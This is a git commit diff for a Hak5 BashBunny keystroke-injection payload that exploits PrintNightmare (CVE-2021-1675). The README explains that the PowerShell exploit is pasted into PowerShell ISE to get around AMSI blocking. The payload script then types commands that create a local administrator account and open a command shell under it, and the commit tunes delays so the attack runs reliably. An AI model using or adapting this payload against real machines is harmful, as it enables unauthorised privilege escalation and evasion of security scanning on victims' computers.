Bugfix (#433)

* New Payload

Added new PrintNightmare Payload (Quick and dirty)

* Fixed my potty mouth

I'm a child sometimes

* Renamed Payload

* PrintNightmare: Use SWITCH_POSITION in payload path

* Fixing a typo

* Added Delays

Added some delays due to the fact that it was inconsistently reliable, occasionally it'd half type out the command. The delays have resolved the consistency issue on my end. Feel free to tweak as required.

* Amending Version Number

I'm a fool

* Updated Readme with proper credit

Co-authored-by: Marc <foxtrot@malloc.me>

payloads/library/execution/PrintNightmare/README.md

@@ -1,6 +1,17 @@
-# PrintNightmare-BB-Payload
+Title:         PrintNightmare
-PrintNightmare Payload for the Hak5 BashBunny
+Author:        PanicACid
-Building a quick and dirty condenced verison of https://github.com/calebstewart/CVE-2021-1675 for the Hak5 BashBunny
+Version:       1.1
+
+Leverages the following Powershell script https://github.com/calebstewart/CVE-2021-1675 to invoke the PrintNightmare Vuln and create a local administator
+
+As Powershell ASAI or whatever it's called kept picking it up and blocking it. However if we run it via PowersShell ISE it works fine. So we're going to type out the whole thing!
+
+Huge thanks to Cribbit for the clipboard string- without it I would have been typing out the whole thing which when I tried it took FOREVER. Additionally thanks to Korben and Foxtrot for putting up with my nonsense.
+
+
+# Purple.............Loading
+# Green .............Execute
+# Off................Finished
 
 Note that it's set to GB for my language, set to yours so you get the correct \'s when copying the text file to clipboard.
 

payloads/library/execution/PrintNightmare/payload.txt

@@ -1,6 +1,6 @@
 # Title:         Quick and Dirty PrintNightmare
-# Author:        PanicAcid
+# Author:        PanicACid
-# Version:       1.0
+# Version:       1.1
 #
 # Leverages the following Powershell script https://github.com/calebstewart/CVE-2021-1675 to invoke the PrintNightmare Vuln and create a local administator
 # As Powershell ASAI or whatever it's called kept picking it up and blocking it. However if we run it via PowersShell ISE it works fine. So we're going to type out the whole
@@ -37,8 +37,12 @@ QUACK ENTER
 QUACK DELAY 100
 QUACK STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\juicybit.txt'))"
 QUACK ENTER
+QUACK DELAY 500
+QUACK STRING exit
+QUACK ENTER
+QUACK DELAY 500
 QUACK GUI r
-QUACK DELAY 300
+QUACK DELAY 500
 QUACK STRING powershell_ise.exe
 QUACK ENTER
 QUACK DELAY 4000
@@ -46,21 +50,24 @@ QUACK CONTROL d
 QUACK CONTROL v
 QUACK CONTROL d
 QUACK ENTER
+QUACK DELAY 2000
 QUACK STRING "Invoke-Nightmare -DriverName 'Hak5Rules' -NewUser 'Hak5Rules' -NewPassword 'Hak5Rules'"
 QUACK ENTER
+QUACK DELAY 4000
 QUACK ALT F4
 QUACK GUI r
-QUACK DELAY 150
+QUACK DELAY 500
 QUACK STRING cmd
 QUACK DELAY 150
 QUACK ENTER
 QUACK DELAY 150
-QUACK STRING runas /user:Hak5Rules cmd.exe
+QUACK STRING "runas /user:Hak5Rules cmd.exe && exit"
 QUACK ENTER
 QUACK DELAY 150
 QUACK STRING Hak5Rules
 QUACK DELAY 150
 QUACK ENTER
+
 #-----------------------------------
 # Kill the lights - finished
 LED FINISH